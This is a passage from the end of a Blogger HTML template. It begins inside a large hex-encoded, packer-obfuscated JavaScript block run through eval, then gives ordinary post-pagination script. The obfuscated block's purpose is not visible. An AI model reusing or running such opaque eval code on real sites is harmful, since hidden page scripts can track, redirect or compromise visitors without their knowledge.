x5c\x39\x5c\x5c\x44\x5c\x5c\x6b\x5c\x5c\x6e\x5c\x5c\x49\x5c\x5c\x39\x5c\x5c\x6b\x5c\x5c\x62\x5c\x5c\x70\x5c\x5c\x49\x5c\x5c\x65\x5c\x5c\x45\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x69\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x65\x5c\x5c\x45\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x45\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x65\x5c\x5c\x46\x5c\x5c\x6c\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x69\x5c\x5c\x74\x5c\x5c\x48\x5c\x5c\x39\x5c\x5c\x69\x5c\x5c\x59\x5c\x5c\x69\x5c\x5c\x5a\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x74\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x69\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x7a\x5c\x5c\x69\x5c\x5c\x6c\x5c\x5c\x71\x5c\x5c\x62\x5c\x5c\x31\x65\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x59\x5c\x5c\x71\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x31\x36\x5c\x5c\x31\x34\x5c\x5c\x31\x63\x5c\x5c\x31\x30\x5c\x5c\x31\x36\x5c\x5c\x31\x32\x5c\x5c\x31\x61\x5c\x5c\x57\x5c\x5c\x31\x37\x5c\x5c\x31\x67\x5c\x5c\x31\x6f\x5c\x5c\x57\x5c\x5c\x31\x76\x5c\x5c\x57\x5c\x5c\x31\x37\x5c\x5c\x39\x5c\x5c\x31\x36\x5c\x5c\x31\x34\x5c\x5c\x31\x63\x5c\x5c\x31\x30\x5c\x5c\x31\x36\x5c\x5c\x31\x32\x5c\x5c\x31\x61\x5c\x5c\x57\x5c\x5c\x31\x37\x5c\x5c\x31\x67\x5c\x5c\x31\x34\x5c\x5c\x31\x62\x5c\x5c\x31\x64\x5c\x5c\x57\x5c\x5c\x31\x37\x5c\x5c\x39\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x52\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x6e\x5c\x5c\x6b\x5c\x5c\x74\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x45\x5c\x5c\x31\x67\x5c\x5c\x43\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x79\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x69\x5c\x5c\x5a\x5c\x5c\x39\x5c\x5c\x59\x5c\x5c\x71\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x7a\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x69\x5c\x5c\x31\x30\x5c\x5c\x48\x5c\x5c\x7a\x5c\x5c\x62\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x46\x5c\x5c\x42\x5c\x5c\x42\x5c\x5c\x62\x5c\x5c\x71\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x44\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x69\x5c\x5c\x4f\x5c\x5c\x39\x5c\x5c\x69\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x70\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x39\x5c\x5c\x65\x5c\x5c\x48\x5c\x5c\x7a\x5c\x5c\x62\x5c\x5c\x39\x5c\x5c\x42\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x49\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x48\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x42\x5c\x5c\x6c\x5c\x5c\x6d\x5c\x5c\x7a\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x79\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x71\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x65\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x6b\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x74\x5c\x5c\x31\x67\x5c\x5c\x70\x5c\x5c\x46\x5c\x5c\x79\x5c\x5c\x44\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x7a\x5c\x5c\x46\x5c\x5c\x44\x5c\x5c\x6b\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x62\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x65\x5c\x5c\x69\x5c\x5c\x49\x5c\x5c\x39\x5c\x5c\x31\x66\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x62\x5c\x5c\x39\x5c\x5c\x31\x38\x5c\x5c\x6b\x5c\x5c\x6e\x5c\x5c\x49\x5c\x5c\x49\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x31\x30\x5c\x5c\x62\x5c\x5c\x79\x5c\x5c\x7a\x5c\x5c\x6b\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x7a\x5c\x5c\x6b\x5c\x5c\x69\x5c\x5c\x48\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x6e\x5c\x5c\x43\x5c\x5c\x6e\x5c\x5c\x6b\x5c\x5c\x6b\x5c\x5c\x6e\x5c\x5c\x52\x5c\x5c\x39\x5c\x5c\x6b\x5c\x5c\x6e\x5c\x5c\x42\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x6d\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x39\x5c\x5c\x49\x5c\x5c\x62\x5c\x5c\x65\x5c\x5c\x57\x5c\x5c\x6b\x5c\x5c\x62\x5c\x5c\x79\x5c\x5c\x62\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x31\x38\x5c\x5c\x48\x5c\x5c\x31\x65\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x48\x5c\x5c\x42\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x70\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x6b\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x70\x5c\x5c\x6b\x5c\x5c\x6d\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x39\x5c\x5c\x44\x5c\x5c\x6b\x5c\x5c\x6e\x5c\x5c\x42\x5c\x5c\x4f\x5c\x5c\x39\x5c\x5c\x53\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x6d\x5c\x5c\x44\x5c\x5c\x6b\x5c\x5c\x62\x5c\x5c\x39\x5c\x5c\x6e\x5c\x5c\x7a\x5c\x5c\x69\x5c\x5c\x42\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x48\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x70\x5c\x5c\x70\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x31\x68\x5c\x5c\x31\x30\x5c\x5c\x31\x6d\x5c\x5c\x31\x62\x5c\x5c\x39\x5c\x5c\x53\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x6d\x5c\x5c\x44\x5c\x5c\x6d\x5c\x5c\x6b\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x48\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x43\x5c\x5c\x44\x5c\x5c\x74\x5c\x5c\x73\x5c\x5c\x43\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x70\x5c\x5c\x45\x5c\x5c\x62\x5c\x5c\x6c\x5c\x5c\x6d\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x42\x5c\x5c\x6e\x5c\x5c\x6b\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x63\x5c\x5c\x4e\x5c\x5c\x31\x31\x5c\x5c\x31\x31\x5c\x5c\x39\x5c\x5c\x6e\x5c\x5c\x70\x5c\x5c\x6b\x5c\x5c\x6e\x5c\x5c\x69\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x70\x5c\x5c\x6e\x5c\x5c\x31\x67\x5c\x5c\x6d\x5c\x5c\x79\x5c\x5c\x69\x5c\x5c\x49\x5c\x5c\x62\x5c\x5c\x39\x5c\x5c\x31\x63\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x69\x5c\x5c\x31\x30\x5c\x5c\x62\x5c\x5c\x79\x5c\x5c\x7a\x5c\x5c\x6b\x5c\x5c\x69\x5c\x5c\x65\x5c\x5c\x62\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x65\x5c\x5c\x45\x5c\x5c\x46\x5c\x5c\x79\x5c\x5c\x44\x5c\x5c\x70\x5c\x5c\x69\x5c\x5c\x6d\x5c\x5c\x6b\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x62\x5c\x5c\x74\x5c\x5c\x6d\x5c\x5c\x69\x5c\x5c\x39\x5c\x5c\x45\x5c\x5c\x65\x5c\x5c\x65\x5c\x5c\x7a\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x42\x5c\x5c\x62\x5c\x5c\x70\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x6d\x5c\x5c\x6c\x5c\x5c\x71\x5c\x5c\x65\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x31\x69\x5c\x5c\x73\x5c\x5c\x39\x5c\x5c\x42\x5c\x5c\x6b\x5c\x5c\x62\x5c\x5c\x69\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x31\x33\x5c\x5c\x74\x5c\x5c\x62\x5c\x5c\x43\x5c\x5c\x69\x5c\x5c\x46\x5c\x5c\x6b\x5c\x5c\x65\x22\x2c\x22\x22\x2c\x22\x5c\x5c\x43\x5c\x5c\x6c\x5c\x5c\x6e\x5c\x5c\x79\x5c\x5c\x31\x35\x5c\x5c\x45\x5c\x5c\x69\x5c\x5c\x6c\x5c\x5c\x31\x35\x5c\x5c\x6e\x5c\x5c\x74\x5c\x5c\x62\x22\x2c\x22\x5c\x5c\x31\x49\x5c\x5c\x44\x22\x2c\x22\x5c\x5c\x49\x22\x2c\x22\x5c\x5c\x6c\x5c\x5c\x62\x5c\x5c\x7a\x5c\x5c\x6b\x5c\x5c\x69\x5c\x5c\x42\x5c\x5c\x62\x22\x5d\x3b\x31\x4f\x28\x31\x44\x28\x31\x71\x2c\x31\x74\x2c\x56\x2c\x31\x7a\x2c\x31\x72\x2c\x31\x57\x29\x7b\x31\x72\x3d\x31\x44\x28\x56\x29\x7b\x31\x45\x28\x56\x3c\x31\x74\x3f\x58\x5b\x34\x5d\x3a\x31\x72\x28\x31\x56\x28\x56\x2f\x31\x74\x29\x29\x29\x2b\x28\x28\x56\x3d\x56\x25\x31\x74\x29\x3e\x31\x55\x3f\x31\x54\x5b\x58\x5b\x35\x5d\x5d\x28\x56\x2b\x31\x53\x29\x3a\x56\x2e\x31\x52\x28\x31\x4a\x29\x29\x7d\x3b\x31\x50\x28\x56\x2d\x2d\x29\x7b\x31\x51\x28\x31\x7a\x5b\x56\x5d\x29\x7b\x31\x71\x3d\x31\x71\x5b\x58\x5b\x38\x5d\x5d\x28\x31\x4e\x20\x31\x4d\x28\x58\x5b\x36\x5d\x2b\x31\x72\x28\x56\x29\x2b\x58\x5b\x36\x5d\x2c\x58\x5b\x37\x5d\x29\x2c\x31\x7a\x5b\x56\x5d\x29\x7d\x7d\x3b\x31\x45\x20\x31\x71\x7d\x28\x58\x5b\x30\x5d\x2c\x31\x4c\x2c\x31\x4b\x2c\x58\x5b\x33\x5d\x5b\x58\x5b\x32\x5d\x5d\x28\x58\x5b\x31\x5d\x29\x29\x29\x27\x2c\x36\x32\x2c\x31\x32\x31\x2c\x27\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x78\x37\x43\x7c\x78\x32\x32\x7c\x78\x36\x35\x7c\x78\x33\x31\x7c\x78\x32\x45\x7c\x78\x37\x34\x7c\x78\x32\x30\x7c\x78\x32\x39\x7c\x78\x32\x38\x7c\x78\x36\x31\x7c\x78\x32\x37\x7c\x78\x36\x43\x7c\x78\x37\x32\x7c\x78\x36\x39\x7c\x78\x36\x46\x7c\x78\x33\x44\x7c\x78\x36\x45\x7c\x78\x37\x33\x7c\x78\x32\x42\x7c\x78\x33\x32\x7c\x78\x36\x34\x7c\x78\x32\x44\x7c\x78\x32\x46\x7c\x78\x33\x45\x7c\x78\x33\x43\x7c\x78\x36\x44\x7c\x78\x37\x30\x7c\x78\x33\x42\x7c\x78\x36\x33\x7c\x78\x36\x36\x7c\x78\x36\x32\x7c\x78\x36\x38\x7c\x78\x37\x35\x7c\x78\x32\x43\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x33\x41\x7c\x78\x37\x44\x7c\x78\x33\x33\x7c\x78\x37\x42\x7c\x78\x33\x36\x7c\x78\x36\x42\x7c\x78\x33\x39\x7c\x78\x32\x34\x7c\x78\x37\x37\x7c\x78\x37\x36\x7c\x78\x35\x42\x7c\x78\x35\x44\x7c\x5f\x30\x78\x31\x66\x30\x36\x78\x33\x7c\x78\x34\x35\x7c\x5f\x30\x78\x39\x38\x34\x33\x7c\x78\x36\x41\x7c\x78\x37\x38\x7c\x78\x35\x34\x7c\x78\x33\x30\x7c\x78\x34\x31\x7c\x78\x37\x31\x7c\x78\x34\x46\x7c\x78\x34\x33\x7c\x78\x35\x30\x7c\x78\x35\x32\x7c\x78\x34\x32\x7c\x78\x37\x41\x7c\x78\x34\x37\x7c\x78\x34\x43\x7c\x78\x35\x33\x7c\x78\x34\x34\x7c\x78\x34\x39\x7c\x78\x34\x36\x7c\x78\x35\x46\x7c\x78\x34\x38\x7c\x78\x33\x37\x7c\x78\x34\x42\x7c\x78\x32\x33\x7c\x78\x32\x31\x7c\x78\x34\x44\x7c\x78\x34\x41\x7c\x78\x34\x45\x7c\x78\x35\x35\x7c\x5f\x30\x78\x31\x66\x30\x36\x78\x31\x7c\x5f\x30\x78\x31\x66\x30\x36\x78\x35\x7c\x78\x33\x38\x7c\x5f\x30\x78\x31\x66\x30\x36\x78\x32\x7c\x78\x35\x36\x7c\x78\x35\x37\x7c\x78\x33\x34\x7c\x78\x35\x31\x7c\x78\x33\x35\x7c\x5f\x30\x78\x31\x66\x30\x36\x78\x34\x7c\x78\x35\x39\x7c\x78\x35\x38\x7c\x78\x35\x41\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x72\x65\x74\x75\x72\x6e\x7c\x78\x32\x36\x7c\x78\x33\x46\x7c\x76\x61\x72\x7c\x78\x35\x43\x7c\x33\x36\x7c\x31\x34\x33\x7c\x36\x32\x7c\x52\x65\x67\x45\x78\x70\x7c\x6e\x65\x77\x7c\x65\x76\x61\x6c\x7c\x77\x68\x69\x6c\x65\x7c\x69\x66\x7c\x74\x6f\x53\x74\x72\x69\x6e\x67\x7c\x32\x39\x7c\x53\x74\x72\x69\x6e\x67\x7c\x33\x35\x7c\x70\x61\x72\x73\x65\x49\x6e\x74\x7c\x5f\x30\x78\x31\x66\x30\x36\x78\x36\x27\x2e\x73\x70\x6c\x69\x74\x28\x27\x7c\x27\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x0a";eval(_QD81Hc);
4695 //]]>
4696</script>
4697<b:if cond='data:blog.pageType != "static_page"'>
4698<b:if cond='data:blog.pageType!= "item"'>
4699<b:if cond='data:blog.pageType != "error_page"'>
4700<!--Page Navigation Starts-->
4701<script type='text/javascript'>
4702var postperpage= 8;
4703var numshowpage=3;
4704var upPageWord ='Prev';
4705var downPageWord ='Next';
4706var urlactivepage=location.href;
4707var home_page="/";
4708</script>
4709<script type='text/javascript'>
4710//<![CDATA[
4711var nopage;var jenis;var nomerhal;var lblname1;halamanblogger();function loophalaman(banyakdata){var html='';nomerkiri=parseInt(numshowpage/2);if(nomerkiri==numshowpage-nomerkiri){numshowpage=nomerkiri*2+1}mulai=nomerhal-nomerkiri;if(mulai<1)mulai=1;maksimal=parseInt(banyakdata/postperpage)+1;if(maksimal-1==banyakdata/postperpage)maksimal=maksimal-1;akhir=mulai+numshowpage-1;if(akhir>maksimal)akhir=maksimal;html+="<span class='showpageOf'>Page "+nomerhal+' of '+maksimal+"</span>";var prevnomer=parseInt(nomerhal)-1;if(nomerhal>1){if(nomerhal==2){if(jenis=="page"){html+='<span class="showpage"><a href="'+home_page+'">'+upPageWord+'</a></span>'}else{html+='<span class="showpageNum"><a href="/search/label/'+lblname1+'?&max-results='+postperpage+'">'+upPageWord+'</a></span>'}}else{if(jenis=="page"){html+='<span class="showpageNum"><a href="#" onclick="redirectpage('+prevnomer+');return false">'+upPageWord+'</a></span>'}else{html+='<span class="showpageNum"><a href="#" onclick="redirectlabel('+prevnomer+');return false">'+upPageWord+'</a></span>'}}}if(mulai>1){if(jenis=="page"){html+='<span class="showpageNum"><a href="'+home_page+'">1</a></span>'}else{html+='<span class="showpageNum"><a href="/search/label/'+lblname1+'?&max-results='+postperpage+'">1</a></span>'}}if(mulai>2){html+=' '}for(var jj=mulai;jj<=akhir;jj++){if(nomerhal==jj){html+='<span class="showpagePoint">'+jj+'</span>'}else if(jj==1){if(jenis=="page"){html+='<span class="showpageNum"><a href="'+home_page+'">1</a></span>'}else{html+='<span class="showpageNum"><a href="/search/label/'+lblname1+'?&max-results='+postperpage+'">1</a></span>'}}else{if(jenis=="page"){html+='<span class="showpageNum"><a href="#" onclick="redirectpage('+jj+');return false">'+jj+'</a></span>'}else{html+='<span class="showpageNum"><a href="#" onclick="redirectlabel('+jj+');return false">'+jj+'</a></span>'}}}if(akhir<maksimal-1){html+=''}if(akhir<maksimal){if(jenis=="page"){html+='<span class="showpageNum"><a href="#" onclick="redirectpage('+maksimal+');return false">'+maksimal+'</a></span>'}else{html+='<span class="showpageNum"><a href="#" onclick="redirectlabel('+maksimal+');return false">'+maksimal+'</a></span>'}}var nextnomer=parseInt(nomerhal)+1;if(nomerhal<maksimal){if(jenis=="page"){html+='<span class="showpageNum"><a href="#" onclick="redirectpage('+nextnomer+');return false">'+downPageWord+'</a></span>'}else{html+='<span class="showpageNum"><a href="#" onclick="redirectlabel('+nextnomer+');return false">'+downPageWord+'</a></span>'}}var pageArea=document.getElementsByName("pageArea");var blogPager=document.getElementById("blog-pager");for(var p=0;p<pageArea.length;p++){pageArea[p].innerHTML=html}if(pageArea&&pageArea.length>0){html=''}if(blogPager){blogPager.innerHTML=html}}function hitungtotaldata(root){var feed=root.feed;var totaldata=parseInt(feed.openSearch$totalResults.$t,10);loophalaman(totaldata)}function halamanblogger(){var thisUrl=urlactivepage;if(thisUrl.indexOf("/search/label/")!=-1){if(thisUrl.indexOf("?updated-max")!=-1){lblname1=thisUrl.substring(thisUrl.indexOf("/search/label/")+14,thisUrl.indexOf("?updated-max"))}else{lblname1=thisUrl.substring(thisUrl.indexOf("/search/label/")+14,thisUrl.indexOf("?&max"))}}if(thisUrl.indexOf("?q=")==-1&&thisUrl.indexOf(".html")==-1){if(thisUrl.indexOf("/search/label/")==-1){jenis="page";if(urlactivepage.indexOf("#PageNo=")!=-1){nomerhal=urlactivepage.substring(urlactivepage.indexOf("#PageNo=")+8,urlactivepage.length)}else{nomerhal=1}document.write("<script src=\""+home_page+"feeds/posts/summary?max-results=1&alt=json-in-script&callback=hitungtotaldata\"><\/script>")}else{jenis="label";if(thisUrl.indexOf("&max-results=")==-1){postperpage=20}if(urlactivepage.indexOf("#PageNo=")!=-1){nomerhal=urlactivepage.substring(urlactivepage.indexOf("#PageNo=")+8,urlactivepage.length)}else{nomerhal=1}document.write('<script src="'+home_page+'feeds/posts/summary/-/'+lblname1+'?alt=json-in-script&callback=hitungtotaldata&max-results=1" ><\/script>')}}}function redirectpage(numberpage){jsonstart=(numberpage-1)*postperpage;nopage=numberpage;var nBody=document.getElementsByTagName('head')[0];var newInclude=document.createElement('script');newInclude.type='text/javascript';newInclude.setAttribute("src",home_page+"feeds/posts/summary?start-index="+jsonstart+"&max-results=1&alt=json-in-script&callback=finddatepost");nBody.appendChild(newInclude)}function redirectlabel(numberpage){jsonstart=(numberpage-1)*postperpage;nopage=numberpage;var nBody=document.getElementsByTagName('head')[0];var newInclude=document.createElement('script');newInclude.type='text/javascript';newInclude.setAttribute("src",home_page+"feeds/posts/summary/-/"+lblname1+"?start-index="+jsonstart+"&max-results=1&alt=json-in-script&callback=finddatepost");nBody.appendChild(newInclude)}function finddatepost(root){post=root.feed.entry[0];var timestamp1=post.published.$t.substring(0,19)+post.published.$t.substring(23,29);var timestamp=encodeURIComponent(timestamp1);if(jenis=="page"){var alamat="/search?updated-max="+timestamp+"&max-results="+postperpage+"#PageNo="+nopage}else{var alamat="/search/label/"+lblname1+"?updated-max="+timestamp+"&max-results="+postperpage+"#PageNo="+nopage}location.href=alamat}
4712//]]>
4713</script>
4714</b:if>
4715</b:if>
4716</b:if>
4717<!--Page Navigation Ends -->
4718</body>
4719</html>